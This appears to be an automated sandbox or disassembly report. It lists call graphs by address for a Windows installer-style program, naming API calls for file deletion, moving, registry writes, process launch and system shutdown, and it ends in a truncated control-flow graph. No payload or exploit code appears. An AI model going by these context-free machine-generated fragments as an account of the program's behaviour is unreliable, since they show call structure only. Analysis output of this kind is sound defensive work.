401102 CreateFontIndirectW 4638->4639 4640 401167 EndPaint 4638->4640 4639->4640 4641 401112 6 API calls 4639->4641 4640->4636 4641->4640 4642 402a80 4643 402da9 21 API calls 4642->4643 4644 402a86 4643->4644 4645 402ac9 4644->4645 4646 402aad 4644->4646 4649 402953 4644->4649 4647 402ae3 4645->4647 4648 402ad3 4645->4648 4651 402ab2 4646->4651 4655 402ac3 4646->4655 4650 4066df 21 API calls 4647->4650 4652 402da9 21 API calls 4648->4652 4650->4655 4656 4066a2 lstrcpynW 4651->4656 4652->4655 4655->4649 4657 4065e9 wsprintfW 4655->4657 4656->4649 4657->4649 3335 401781 3341 402dcb 3335->3341 3339 40178f 3340 4061c1 2 API calls 3339->3340 3340->3339 3342 402dd7 3341->3342 3343 4066df 21 API calls 3342->3343 3344 402df8 3343->3344 3345 401788 3344->3345 3346 406950 5 API calls 3344->3346 3347 4061c1 3345->3347 3346->3345 3348 4061ce GetTickCount GetTempFileNameW 3347->3348 3349 406208 3348->3349 3350 406204 3348->3350 3349->3339 3350->3348 3350->3349 3351 403c82 3352 403c93 CloseHandle 3351->3352 3353 403c9d 3351->3353 3352->3353 3354 403cb1 3353->3354 3355 403ca7 CloseHandle 3353->3355 3360 403cdf 3354->3360 3355->3354 3361 403ced 3360->3361 3362 403cb6 3361->3362 3363 403cf2 FreeLibrary GlobalFree 3361->3363 3364 405dae 3362->3364 3363->3362 3363->3363 3400 406079 3364->3400 3367 405dd6 DeleteFileW 3369 403cc2 3367->3369 3368 405ded 3371 405f0d 3368->3371 3414 4066a2 lstrcpynW 3368->3414 3371->3369 3443 4069ff FindFirstFileW 3371->3443 3372 405e13 3373 405e26 3372->3373 3374 405e19 lstrcatW 3372->3374 3435 405fbd lstrlenW 3373->3435 3375 405e2c 3374->3375 3378 405e3c lstrcatW 3375->3378 3380 405e47 lstrlenW FindFirstFileW 3375->3380 3378->3380 3380->3371 3398 405e69 3380->3398 3383 405ef0 FindNextFileW 3386 405f06 FindClose 3383->3386 3383->3398 3384 405d66 5 API calls 3387 405f48 3384->3387 3386->3371 3388 405f62 3387->3388 3389 405f4c 3387->3389 3391 405727 28 API calls 3388->3391 3389->3369 3392 405727 28 API calls 3389->3392 3391->3369 3394 405f59 3392->3394 3393 405dae 64 API calls 3393->3398 3396 406462 40 API calls 3394->3396 3396->3369 3397 405727 28 API calls 3397->3398 3398->3383 3398->3393 3398->3397 3415 4066a2 lstrcpynW 3398->3415 3416 405d66 3398->3416 3424 405727 3398->3424 3439 406462 MoveFileExW 3398->3439 3449 4066a2 lstrcpynW 3400->3449 3402 40608a 3450 40601c CharNextW CharNextW 3402->3450 3405 405dce 3405->3367 3405->3368 3406 406950 5 API calls 3412 4060a0 3406->3412 3407 4060d1 lstrlenW 3408 4060dc 3407->3408 3407->3412 3409 405f71 3 API calls 3408->3409 3411 4060e1 GetFileAttributesW 3409->3411 3410 4069ff 2 API calls 3410->3412 3411->3405 3412->3405 3412->3407 3412->3410 3413 405fbd 2 API calls 3412->3413 3413->3407 3414->3372 3415->3398 3456 40616d GetFileAttributesW 3416->3456 3419 405d93 3419->3398 3420 405d81 RemoveDirectoryW 3422 405d8f 3420->3422 3421 405d89 DeleteFileW 3421->3422 3422->3419 3423 405d9f SetFileAttributesW 3422->3423 3423->3419 3425 405742 3424->3425 3434 4057e4 3424->3434 3426 40575e lstrlenW 3425->3426 3429 4066df 21 API calls 3425->3429 3427 405787 3426->3427 3428 40576c lstrlenW 3426->3428 3431 40579a 3427->3431 3432 40578d SetWindowTextW 3427->3432 3430 40577e lstrcatW 3428->3430 3428->3434 3429->3426 3430->3427 3433 4057a0 SendMessageW SendMessageW SendMessageW 3431->3433 3431->3434 3432->3431 3433->3434 3434->3383 3436 405fcb 3435->3436 3437 405fd1 CharPrevW 3436->3437 3438 405fdd 3436->3438 3437->3436 3437->3438 3438->3375 3440 406483 3439->3440 3441 406476 3439->3441 3440->3398 3459 4062e8 3441->3459 3444 405f32 3443->3444 3445 406a15 FindClose 3443->3445 3444->3369 3446 405f71 lstrlenW CharPrevW 3444->3446 3445->3444 3447 405f3c 3446->3447 3448 405f8d lstrcatW 3446->3448 3447->3384 3448->3447 3449->3402 3451 406039 3450->3451 3452 40604b 3450->3452 3451->3452 3453 406046 CharNextW 3451->3453 3454 405f9e CharNextW 3452->3454 3455 40606f 3452->3455 3453->3455 3454->3452 3455->3405 3455->3406 3457 405d72 3456->3457 3458 40617f SetFileAttributesW 3456->3458 3457->3419 3457->3420 3457->3421 3458->3457 3460 406318 3459->3460 3461 40633e GetShortPathNameW 3459->3461 3486 406192 GetFileAttributesW CreateFileW 3460->3486 3462 406353 3461->3462 3463 40645d 3461->3463 3462->3463 3466 40635b wsprintfA 3462->3466 3463->3440 3465 406322 CloseHandle GetShortPathNameW 3465->3463 3467 406336 3465->3467 3468 4066df 21 API calls 3466->3468 3467->3461 3467->3463 3469 406383 3468->3469 3487 406192 GetFileAttributesW CreateFileW 3469->3487 3471 406390 3471->3463 3472 40639f GetFileSize GlobalAlloc 3471->3472 3473 4063c1 3472->3473 3474 406456 CloseHandle 3472->3474 3488 406215 ReadFile 3473->3488 3474->3463 3479 4063e0 lstrcpyA 3481 406402 3479->3481 3480 4063f4 3482 4060f7 4 API calls 3480->3482 3483 406439 SetFilePointer 3481->3483 3482->3481 3495 406244 WriteFile 3483->3495 3486->3465 3487->3471 3489 406233 3488->3489 3489->3474 3490 4060f7 lstrlenA 3489->3490 3491 406138 lstrlenA 3490->3491 3492 406140 3491->3492 3493 406111 lstrcmpiA 3491->3493 3492->3479 3492->3480 3493->3492 3494 40612f CharNextA 3493->3494 3494->3491 3496 406262 GlobalFree 3495->3496 3496->3474 4658 401d82 4659 402da9 21 API calls 4658->4659 4660 401d93 SetWindowLongW 4659->4660 4661 402c4f 4660->4661 3516 402903 3517 40290b 3516->3517 3518 40290f FindNextFileW 3517->3518 3520 402921 3517->3520 3519 402968 3518->3519 3518->3520 3522 4066a2 lstrcpynW 3519->3522 3522->3520 3523 401f03 3524 402da9 21 API calls 3523->3524 3525 401f09 3524->3525 3526 402da9 21 API calls 3525->3526 3527 401f15 3526->3527 3528 401f21 ShowWindow 3527->3528 3529 401f2c EnableWindow 3527->3529 3530 402c4f 3528->3530 3529->3530 4662 401503 4663 401508 4662->4663 4664 40152e 4662->4664 4665 402da9 21 API calls 4663->4665 4665->4664 4666 401588 4667 402bc9 4666->4667 4670 4065e9 wsprintfW 4667->4670 4669 402bce 4670->4669 4678 40198d 4679 402da9 21 API calls 4678->4679 4680 401994 4679->4680 4681 402da9 21 API calls 4680->4681 4682 4019a1 4681->4682 4683 402dcb 21 API calls 4682->4683 4684 4019b8 lstrlenW 4683->4684 4685 4019c9 4684->4685 4686 401a0a 4685->4686 4690 4066a2 lstrcpynW 4685->4690 4688 4019fa 4688->4686 4689 4019ff lstrlenW 4688->4689 4689->4686 4690->4688 4691 40508e GetDlgItem GetDlgItem 4692 4050e0 7 API calls 4691->4692 4705 405305 4691->4705 4693 405187 DeleteObject 4692->4693 4694 40517a SendMessageW 4692->4694 4695 405190 4693->4695 4694->4693 4697 4051c7 4695->4697 4699 4066df 21 API calls 4695->4699 4696 4053e7 4698 405493 4696->4698 4708 405440 SendMessageW 4696->4708 4731 4052f8 4696->4731 4700 404621 22 API calls 4697->4700 4703 4054a5 4698->4703 4704 40549d SendMessageW 4698->4704 4706 4051a9 SendMessageW SendMessageW 4699->4706 4701 4051db 4700->4701 4707 404621 22 API calls 4701->4707 4702 405374 4702->4696 4709 4053d9 SendMessageW 4702->4709 4715 4054b7 ImageList_Destroy 4703->4715 4716 4054be 4703->4716 4727 4054ce 4703->4727 4704->4703 4705->4696 4705->4702 4745 404fdc SendMessageW 4705->4745 4706->4695 4722 4051ec 4707->4722 4713 405455 SendMessageW 4708->4713 4708->4731 4709->4696 4710 404688 8 API calls 4714 405694 4710->4714 4712 405648 4720 40565a ShowWindow GetDlgItem ShowWindow 4712->4720 4712->4731 4719 405468 4713->4719 4715->4716 4717 4054c7 GlobalFree 4716->4717 4716->4727 4717->4727 4718 4052c7 GetWindowLongW SetWindowLongW 4721 4052e0 4718->4721 4728 405479 SendMessageW 4719->4728 4720->4731 4723 4052e5 ShowWindow 4721->4723 4724 4052fd 4721->4724 4722->4718 4726 40523f SendMessageW 4722->4726 4729 4052c2 4722->4729 4732 405291 SendMessageW 4722->4732 4733 40527d SendMessageW 4722->4733 4743 404656 SendMessageW 4723->4743 4744 404656 SendMessageW 4724->4744 4726->4722 4727->4712 4738 405509 4727->4738 4750 40505c 4727->4750 4728->4698 4729->4718 4729->4721 4731->4710 4732->4722 4733->4722 4735 405613 4736 40561e InvalidateRect 4735->4736 4739 40562a 4735->4739 4736->4739 4737 405537 SendMessageW 4742 40554d 4737->4742 4738->4737 4738->4742 4739->4712 4740 404f97 24 API calls 4739->4740 4740->4712 4741 4055c1 SendMessageW SendMessageW 4741->4742 4742->4735 4742->4741 4743->4731 4744->4705 4746 40503b SendMessageW 4745->4746 4747 404fff GetMessagePos ScreenToClient SendMessageW 4745->4747 4749 405033 4746->4749 4748 405038 4747->4748 4747->4749 4748->4746 4749->4702 4759 4066a2 lstrcpynW 4750->4759 4752 40506f 4760 4065e9 wsprintfW 4752->4760 4754 405079 4755 40140b 2 API calls 4754->4755 4756 405082 4755->4756 4761 4066a2 lstrcpynW 4756->4761 4758 405089 4758->4738 4759->4752 4760->4754 4761->4758 4762 40168f 4763 402dcb 21 API calls 4762->4763 4764 401695 4763->4764 4765 4069ff 2 API calls 4764->4765 4766 40169b 4765->4766 4767 402b10 4768 402da9 21 API calls 4767->4768 4769 402b16 4768->4769 4770 4066df 21 API calls 4769->4770 4771 402953 4769->4771 4770->4771 3591 402711 3592 402da9 21 API calls 3591->3592 3601 402720 3592->3601 3593 40285d 3594 40276a ReadFile 3594->3593 3594->3601 3595 402803 3595->3593 3595->3601 3605 406273 SetFilePointer 3595->3605 3596 406215 ReadFile 3596->3601 3597 4027aa MultiByteToWideChar 3597->3601 3598 40285f 3614 4065e9 wsprintfW 3598->3614 3601->3593 3601->3594 3601->3595 3601->3596 3601->3597 3601->3598 3602 4027d0 SetFilePointer MultiByteToWideChar 3601->3602 3603 402870 3601->3603 3602->3601 3603->3593 3604 402891 SetFilePointer 3603->3604 3604->3593 3606 40628f 3605->3606 3613 4062a7 3605->3613 3607 406215 ReadFile 3606->3607 3608 40629b 3607->3608 3609 4062b0 SetFilePointer 3608->3609 3610 4062d8 SetFilePointer 3608->3610 3608->3613 3609->3610 3611 4062bb 3609->3611 3610->3613 3612 406244 WriteFile 3611->3612 3612->3613 3613->3595 3614->3593 4772 404791 lstrlenW 4773 4047b0 4772->4773 4774 4047b2 WideCharToMultiByte 4772->4774 4773->4774 4775 401491 4776 405727 28 API calls 4775->4776 4777 401498 4776->4777 3615 404b12 3616 404b3e 3615->3616 3617 404b4f 3615->3617 3698 405ce6 GetDlgItemTextW 3616->3698 3619 404b5b GetDlgItem 3617->3619 3625 404bc7 3617->3625 3621 404b6f 3619->3621 3620 404b49 3623 406950 5 API calls 3620->3623 3624 404b83 SetWindowTextW 3621->3624 3629 40601c 4 API calls 3621->3629 3622 404c9e 3678 404e4d 3622->3678 3685 405ce6 GetDlgItemTextW 3622->3685 3623->3617 3681 404621 3624->3681 3625->3622 3630 4066df 21 API calls 3625->3630 3625->3678 3636 404b79 3629->3636 3632 404c2e SHBrowseForFolderW 3630->3632 3631 404cce 3633 406079 18 API calls 3631->3633 3632->3622 3637 404c46 CoTaskMemFree 3632->3637 3638 404cd4 3633->3638 3634 404b9f 3639 404621 22 API calls 3634->3639 3636->3624 3642 405f71 3 API calls 3636->3642 3640 405f71 3 API calls 3637->3640 3686 4066a2 lstrcpynW 3638->3686 3641 404bad 3639->3641 3643 404c53 3640->3643 3684 404656 SendMessageW 3641->3684 3642->3624 3646 404c8a SetDlgItemTextW 3643->3646 3651 4066df 21 API calls 3643->3651 3646->3622 3647 404ceb 3649 406a96 5 API calls 3647->3649 3648 404bb3 3650 406a96 5 API calls 3648->3650 3665 404cf2 3649->3665 3652 404bba 3650->3652 3653 404c72 lstrcmpiW 3651->3653 3655 404bc2 SHAutoComplete 3652->3655 3652->3678 3653->3646 3657 404c83 lstrcatW 3653->3657 3654 404d33 3699 4066a2 lstrcpynW 3654->3699 3655->3625 3657->3646 3658 404d01 GetDiskFreeSpaceExW 3658->3665 3668 404d8b 3658->3668 3659 404d3a 3660 40601c 4 API calls 3659->3660 3661 404d40 3660->3661 3663 404d46 3661->3663 3664 404d49 GetDiskFreeSpaceW 3661->3664 3662 405fbd 2 API calls 3662->3665 3663->3664 3666 404d64 MulDiv 3664->3666 3664->3668 3665->3654 3665->3658 3665->3662 3666->3668 3667 404dfc 3670 404e1f 3667->3670 3700 40140b 3667->3700 3668->3667 3687 404f97 3668->3687 3703 404643 KiUserCallbackDispatcher 3670->3703 3673 404dfe SetDlgItemTextW 3673->3667 3674 404dee 3690 404ece 3674->3690 3676 404e3b 3676->3678 3679 404e48 3676->3679 3707 404688 3678->3707 3704 404a6b 3679->3704 3682 4066df 21 API calls 3681->3682 3683 40462c SetDlgItemTextW 3682->3683 3683->3634 3684->3648 3685->3631 3686->3647 3688 404ece 24 API calls 3687->3688 3689 404de9 3688->3689 3689->3673 3689->3674 3691 404ee7 3690->3691 3692 4066df 21 API calls 3691->3692 3693 404f4b 3692->3693 3694 4066df 21 API calls 3693->3694 3695 404f56 3694->3695 3696 4066df 21 API calls 3695->3696 3697 404f6c lstrlenW wsprintfW SetDlgItemTextW 3696->3697 3697->3667 3698->3620 3699->3659 3721 401389 3700->3721 3703->3676 3705 404a79 3704->3705 3706 404a7e SendMessageW 3704->3706 3705->3706 3706->3678 3708 40474b 3707->3708 3709 4046a0 GetWindowLongW 3707->3709 3709->3708 3710 4046b5 3709->3710 3710->3708 3711 4046e2 GetSysColor 3710->3711 3712 4046e5 3710->3712 3711->3712 3713 4046f5 SetBkMode 3712->3713 3714 4046eb SetTextColor 3712->3714 3715 404713 3713->3715 3716 40470d GetSysColor 3713->3716 3714->3713 3717 404724 3715->3717 3718 40471a SetBkColor 3715->3718 3716->3715 3717->3708 3719 404737 DeleteObject 3717->3719 3720 40473e CreateBrushIndirect 3717->3720 3718->3717 3719->3720 3720->3708 3723 401390 3721->3723 3722 4013fe 3722->3670 3723->3722 3724 4013cb MulDiv SendMessageW 3723->3724 3724->3723 3725 401794 3726 402dcb 21 API calls 3725->3726 3727 40179b 3726->3727 3728 4017c3 3727->3728 3729 4017bb 3727->3729 3780 4066a2 lstrcpynW 3728->3780 3779 4066a2 lstrcpynW 3729->3779 3732 4017c1 3736 406950 5 API calls 3732->3736 3733 4017ce 3734 405f71 3 API calls 3733->3734 3735 4017d4 lstrcatW 3734->3735 3735->3732 3752 4017e0 3736->3752 3737 4069ff 2 API calls 3737->3752 3738 40616d 2 API calls 3738->3752 3740 4017f2 CompareFileTime 3740->3752 3741 4018b2 3742 405727 28 API calls 3741->3742 3743 4018bc 3742->3743 3764 403396 3743->3764 3744 405727 28 API calls 3747 40189e 3744->3747 3745 4066a2 lstrcpynW 3745->3752 3749 4018e3 SetFileTime 3751 4018f5 CloseHandle 3749->3751 3750 4066df 21 API calls 3750->3752 3751->3747 3753 401906 3751->3753 3752->3737 3752->3738 3752->3740 3752->3741 3752->3745 3752->3750 3758 405d02 MessageBoxIndirectW 3752->3758 3762 401889 3752->3762 3763 406192 GetFileAttributesW CreateFileW 3752->3763 3754 40190b 3753->3754 3755 40191e 3753->3755 3756 4066df 21 API calls 3754->3756 3757 4066df 21 API calls 3755->3757 3759 401913 lstrcatW 3756->3759 3760 401926 3757->3760 3758->3752 3759->3760 3761 405d02 MessageBoxIndirectW 3760->3761 3761->3747 3762->3744 3762->3747 3763->3752 3765 4033c1 3764->3765 3766 4033a5 SetFilePointer 3764->3766 3781 40349e GetTickCount 3765->3781 3766->3765 3769 4018cf 3769->3749 3769->3751 3770 406215 ReadFile 3771 4033e1 3770->3771 3771->3769 3772 40349e 46 API calls 3771->3772 3773 4033f8 3772->3773 3773->3769 3774 403464 ReadFile 3773->3774 3776 403407 3773->3776 3774->3769 3776->3769 3777 406215 ReadFile 3776->3777 3778 406244 WriteFile 3776->3778 3777->3776 3778->3776 3779->3732 3780->3733 3782 4035f6 3781->3782 3783 4034cc 3781->3783 3784 403053 36 API calls 3782->3784 3794 40361d SetFilePointer 3783->3794 3791 4033c8 3784->3791 3786 4034d7 SetFilePointer 3788 4034fc 3786->3788 3788->3791 3792 406244 WriteFile 3788->3792 3793 4035d7 SetFilePointer 3788->3793 3795 403607 3788->3795 3798 403053 3788->3798 3812 406c11 3788->3812 3791->3769 3791->3770 3792->3788 3793->3782 3794->3786 3796 406215 ReadFile 3795->3796 3797 40361a 3796->3797 3797->3788 3799 403064 3798->3799 3800 40307c 3798->3800 3801 40306d DestroyWindow 3799->3801 3811 403074 3799->3811 3802 403084 3800->3802 3803 40308c GetTickCount 3800->3803 3801->3811 3804 406ad2 2 API calls 3802->3804 3805 40309a 3803->3805 3803->3811 3804->3811 3806 4030a2 3805->3806 3807 4030cf CreateDialogParamW ShowWindow 3805->3807 3806->3811 3819 403037 3806->3819 3807->3811 3809 4030b0 wsprintfW 3810 405727 28 API calls 3809->3810 3810->3811 3811->3788 3813 406c36 3812->3813 3814 406c3e 3812->3814 3813->3788 3814->3813 3815 406cc5 GlobalFree 3814->3815 3816 406cce GlobalAlloc 3814->3816 3817 406d45 GlobalAlloc 3814->3817 3818 406d3c GlobalFree 3814->3818 3815->3816 3816->3813 3816->3814 3817->3813 3817->3814 3818->3817 3820 403046 3819->3820 3821 403048 MulDiv 3819->3821 3820->3821 3821->3809 4778 401a97 4779 402da9 21 API calls 4778->4779 4780 401aa0 4779->4780 4781 402da9 21 API calls 4780->4781 4782 401a45 4781->4782 4783 401598 4784 4015b1 4783->4784 4785 4015a8 ShowWindow 4783->4785 4786 4015bf ShowWindow 4784->4786 4787 402c4f 4784->4787 4785->4784 4786->4787 4788 402419 4789 402dcb 21 API calls 4788->4789 4790 402428 4789->4790 4791 402dcb 21 API calls 4790->4791 4792 402431 4791->4792 4793 402dcb 21 API calls 4792->4793 4794 40243b GetPrivateProfileStringW 4793->4794 4795 40201b 4796 402dcb 21 API calls 4795->4796 4797 402022 4796->4797 4798 4069ff 2 API calls 4797->4798 4799 402028 4798->4799 4801 402039 4799->4801 4802 4065e9 wsprintfW 4799->4802 4802->4801 4803 40569b 4804 4056ab 4803->4804 4805 4056bf 4803->4805 4806 4056b1 4804->4806 4807 405708 4804->4807 4808 4056c7 IsWindowVisible 4805->4808 4814 4056de 4805->4814 4810 40466d SendMessageW 4806->4810 4809 40570d CallWindowProcW 4807->4809 4808->4807 4811 4056d4 4808->4811 4812 4056bb 4809->4812 4810->4812 4813 404fdc 5 API calls 4811->4813 4813->4814 4814->4809 4815 40505c 4 API calls 4814->4815 4815->4807 4816 401b9c 4817 402dcb 21 API calls 4816->4817 4818 401ba3 4817->4818 4819 402da9 21 API calls 4818->4819 4820 401bac wsprintfW 4819->4820 4821 402c4f 4820->4821 4822 40149e 4823 4023c2 4822->4823 4824 4014ac PostQuitMessage 4822->4824 4824->4823 3827 4016a0 3828 402dcb 21 API calls 3827->3828 3829 4016a7 3828->3829 3830 402dcb 21 API calls 3829->3830 3831 4016b0 3830->3831 3832 402dcb 21 API calls 3831->3832 3833 4016b9 MoveFileW 3832->3833 3834 4016cc 3833->3834 3835 4016c5 3833->3835 3836 4069ff 2 API calls 3834->3836 3839 40231b 3834->3839 3837 401423 28 API calls 3835->3837 3838 4016db 3836->3838 3837->3839 3838->3839 3840 406462 40 API calls 3838->3840 3840->3835 3841 404122 3842 40413a 3841->3842 3843 40429b 3841->3843 3842->3843 3844 404146 3842->3844 3845 4042ec 3843->3845 3846 4042ac GetDlgItem GetDlgItem 3843->3846 3848 404151 SetWindowPos 3844->3848 3849 404164 3844->3849 3847 404346 3845->3847 3858 401389 2 API calls 3845->3858 3850 404621 22 API calls 3846->3850 3904 404296 3847->3904 3912 40466d 3847->3912 3848->3849 3853 40416d ShowWindow 3849->3853 3854 4041af 3849->3854 3851 4042d6 SetClassLongW 3850->3851 3855 40140b 2 API calls 3851->3855 3859 40418d GetWindowLongW 3853->3859 3878 404259 3853->3878 3856 4041b7 DestroyWindow 3854->3856 3857 4041ce 3854->3857 3855->3845 3869 4045aa 3856->3869 3860 4041d3 SetWindowLongW 3857->3860 3861 4041e4 3857->3861 3862 40431e 3858->3862 3864 4041a6 ShowWindow 3859->3864 3859->3878 3860->3904 3866 4041f0 GetDlgItem 3861->3866 3861->3878 3862->3847 3867 404322 SendMessageW 3862->3867 3863 404688 8 API calls 3863->3904 3864->3854 3865 4045ac DestroyWindow KiUserCallbackDispatcher 3865->3869 3871 404201 SendMessageW IsWindowEnabled 3866->3871 3872 40421e 3866->3872 3867->3904 3868 40140b 2 API calls 3902 404358 3868->3902 3870 4045db ShowWindow 3869->3870 3869->3904 3870->3904 3871->3872 3871->3904 3874 40422b 3872->3874 3876 404272 SendMessageW 3872->3876 3877 40423e 3872->3877 3884 404223 3872->3884 3873 4066df 21 API calls 3873->3902 3874->3876 3874->3884 3876->3878 3879 404246 3877->3879 3880 40425b 3877->3880 3878->3863 3883 40140b 2 API calls 3879->3883 3882 40140b 2 API calls 3880->3882 3881 404621 22 API calls 3881->3902 3882->3884 3883->3884 3884->3878 3921 4045fa 3884->3921 3885 404621 22 API calls 3886 4043d3 GetDlgItem 3885->3886 3887 4043f0 ShowWindow KiUserCallbackDispatcher 3886->3887 3888 4043e8 3886->3888 3915 404643 KiUserCallbackDispatcher 3887->3915 3888->3887 3890 40441a KiUserCallbackDispatcher 3895 40442e 3890->3895 3891 404433 GetSystemMenu EnableMenuItem SendMessageW 3892 404463 SendMessageW 3891->3892 3891->3895 3892->3895 3895->3891 3916 404656 SendMessageW 3895->3916 3917 404103 3895->3917 3920 4066a2 lstrcpynW 3895->3920 3897 404492 lstrlenW 3898 4066df 21 API calls 3897->3898 3899 4044a8 SetWindowTextW 3898->3899 3900 401389 2 API calls 3899->3900 3900->3902 3901 4044ec DestroyWindow 3901->3869 3903 404506 CreateDialogParamW 3901->3903 3902->3865 3902->3868 3902->3873 3902->3881 3902->3885 3902->3901 3902->3904 3903->3869 3905 404539 3903->3905 3906 404621 22 API calls 3905->3906 3907 404544 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3906->3907 3908 401389 2 API calls 3907->3908 3909 40458a 3908->3909 3909->3904 3910 404592 ShowWindow 3909->3910 3911 40466d SendMessageW 3910->3911 3911->3869 3913 404685 3912->3913 3914 404676 SendMessageW 3912->3914 3913->3902 3914->3913 3915->3890 3916->3895 3918 4066df 21 API calls 3917->3918 3919 404111 SetWindowTextW 3918->3919 3919->3895 3920->3897 3922 404601 3921->3922 3923 404607 SendMessageW 3921->3923 3922->3923 3923->3878 3924 402324 3925 402dcb 21 API calls 3924->3925 3926 40232a 3925->3926 3927 402dcb 21 API calls 3926->3927 3928 402333 3927->3928 3929 402dcb 21 API calls 3928->3929 3930 40233c 3929->3930 3931 4069ff 2 API calls 3930->3931 3932 402345 3931->3932 3933 402356 lstrlenW lstrlenW 3932->3933 3937 402349 3932->3937 3935 405727 28 API calls 3933->3935 3934 405727 28 API calls 3938 402351 3934->3938 3936 402394 SHFileOperationW 3935->3936 3936->3937 3936->3938 3937->3934 3937->3938 4825 401a24 4826 402dcb 21 API calls 4825->4826 4827 401a2b 4826->4827 4828 402dcb 21 API calls 4827->4828 4829 401a34 4828->4829 4830 401a3b lstrcmpiW 4829->4830 4831 401a4d lstrcmpW 4829->4831 4832 401a41 4830->4832 4831->4832 4237 401da6 4238 401db9 GetDlgItem 4237->4238 4239 401dac 4237->4239 4241 401db3 4238->4241 4240 402da9 21 API calls 4239->4240 4240->4241 4242 401dfa GetClientRect LoadImageW SendMessageW 4241->4242 4243 402dcb 21 API calls 4241->4243 4245 401e58 4242->4245 4247 401e64 4242->4247 4243->4242 4246 401e5d DeleteObject 4245->4246 4245->4247 4246->4247 4840 4023a8 4841 4023af 4840->4841 4844 4023c2 4840->4844 4842 4066df 21 API calls 4841->4842 4843 4023bc 4842->4843 4845 405d02 MessageBoxIndirectW 4843->4845 4845->4844 4846 402c2a SendMessageW 4847 402c44 InvalidateRect 4846->4847 4848 402c4f 4846->4848 4847->4848 4270 4024af 4271 402dcb 21 API calls 4270->4271 4272 4024c1 4271->4272 4273 402dcb 21 API calls 4272->4273 4274 4024cb 4273->4274 4287 402e5b 4274->4287 4277 402953 4278 402503 4280 40250f 4278->4280 4282 402da9 21 API calls 4278->4282 4279 402dcb 21 API calls 4281 4024f9 lstrlenW 4279->4281 4283 40252e RegSetValueExW 4280->4283 4284 403396 48 API calls 4280->4284 4281->4278 4282->4280 4285 402544 RegCloseKey 4283->4285 4284->4283 4285->4277 4288 402e76 4287->4288 4291 40653d 4288->4291 4292 40654c 4291->4292 4293 4024db 4292->4293 4294 406557 RegCreateKeyExW 4292->4294 4293->4277 4293->4278 4293->4279 4294->4293 4295 402930 4296 402dcb 21 API calls 4295->4296 4297 402937 FindFirstFileW 4296->4297 4298 40295f 4297->4298 4302 40294a 4297->4302 4299 402968 4298->4299 4303 4065e9 wsprintfW 4298->4303 4304 4066a2 lstrcpynW 4299->4304 4303->4299 4304->4302 4849 401931 4850 401968 4849->4850 4851 402dcb 21 API calls 4850->4851 4852 40196d 4851->4852 4853 405dae 71 API calls 4852->4853 4854 401976 4853->4854 4855 403d32 4856 403d3d 4855->4856 4857 403d41 4856->4857 4858 403d44 GlobalAlloc 4856->4858 4858->4857 4866 401934 4867 402dcb 21 API calls 4866->4867 4868 40193b 4867->4868 4869 405d02 MessageBoxIndirectW 4868->4869 4870 401944 4869->4870 4335 4028b6 4336 4028bd 4335->4336 4338 402bce 4335->4338 4337 402da9 21 API calls 4336->4337 4339 4028c4 4337->4339 4340 4028d3 SetFilePointer 4339->4340 4340->4338 4341 4028e3 4340->4341 4343 4065e9 wsprintfW 4341->4343 4343->4338 4871 401f37 4872 402dcb 21 API calls 4871->4872 4873 401f3d 4872->4873 4874 402dcb 21 API calls 4873->4874 4875 401f46 4874->4875 4876 402dcb 21 API calls 4875->4876 4877 401f4f 4876->4877 4878 402dcb 21 API calls 4877->4878 4879 401f58 4878->4879 4880 401423 28 API calls 4879->4880 4881 401f5f 4880->4881 4888 405cc8 ShellExecuteExW 4881->4888 4883 401fa7 4884 406b41 5 API calls 4883->4884 4885 402953 4883->4885 4886 401fc4 CloseHandle 4884->4886 4886->4885 4888->4883 4344 402fb8 4345 402fe3 4344->4345 4346 402fca SetTimer 4344->4346 4347 403031 4345->4347 4348 403037 MulDiv 4345->4348 4346->4345 4349 402ff1 wsprintfW SetWindowTextW SetDlgItemTextW 4348->4349 4349->4347 4889 4014b8 4890 4014be 4889->4890 4891 401389 2 API calls 4890->4891 4892 4014c6 4891->4892 4893 401d3c 4894 402da9 21 API calls 4893->4894 4895 401d42 IsWindow 4894->4895 4896 401a45 4895->4896

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 0 403665-4036b7 SetErrorMode GetVersionExW 1 4036f1-4036f6 0->1 2 4036b9-4036e9 GetVersionExW 0->2 3 4036f8 1->3 4 4036fe-403740 1->4 2->1 3->4 5 403742-40374a call 406a96 4->5 6 403753 4->6 5->6 12 40374c 5->12 8 403758-40376c call 406a26 lstrlenA 6->8 13 40376e-40378a call 406a96 * 3 8->13 12->6 20 40379b-4037ff #17 OleInitialize SHGetFileInfoW call 4066a2 GetCommandLineW call 4066a2 13->20 21 40378c-403792 13->21 28 403801-403803 20->28 29 403808-40381c call 405f9e CharNextW 20->29 21->20 25 403794 21->25 25->20 28->29 32 403917-40391d 29->32 33 403821-403827 32->33 34 403923 32->34 35 403830-403837 33->35 36 403829-40382e 33->36 37 403937-403951 GetTempPathW call 403634 34->37 38 403839-40383e 35->38 39 40383f-403843 35->39 36->35 36->36 44 403953-403971 GetWindowsDirectoryW lstrcatW call 403634 37->44 45 4039a9-4039c3 DeleteFileW call 4030f5 37->45 38->39 42 403904-403913 call 405f9e 39->42 43 403849-40384f 39->43 42->32 61 403915-403916 42->61 47 403851-403858 43->47 48 403869-4038a2 43->48 44->45 64 403973-4039a3 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403634 44->64 66 403bb0-403bc0 ExitProcess CoUninitialize 45->66 67 4039c9-4039cf 45->67 52 40385a-40385d 47->52 53 40385f 47->53 54 4038a4-4038a9 48->54 55 4038bf-4038f9 48->55 52->48 52->53 53->48 54->55 56 4038ab-4038b3 54->56 58 403901-403903 55->58 59 4038fb-4038ff 55->59 62 4038b5-4038b8 56->62 63 4038ba 56->63 58->42 59->58 65 403925-403932 call 4066a2 59->65 61->32 62->55 62->63 63->55 64->45 64->66 65->37 69 403bc2-403bd2 call 405d02 ExitProcess 66->69 70 403be6-403bec 66->70 71 4039d5-4039e0 call 405f9e 67->71 72 403a68-403a6f call 403d74 67->72 77 403c6a-403c72 70->77 78 403bee-403c04 GetCurrentProcess OpenProcessToken 70->78 88 4039e2-403a17 71->88 89 403a2e-403a38 71->89 86 403a74-403a78 72->86 80 403c74 77->80 81 403c78-403c7c ExitProcess 77->81 84 403c06-403c34 LookupPrivilegeValueW AdjustTokenPrivileges 78->84 85 403c3a-403c48 call 406a96 78->85 80->81 84->85 97 403c56-403c61 ExitWindowsEx 85->97 98 403c4a-403c54 85->98 86->66 93 403a19-403a1d 88->93 91 403a3a-403a48 call 406079 89->91 92 403a7d-403aa3 call 405c6d lstrlenW call 4066a2 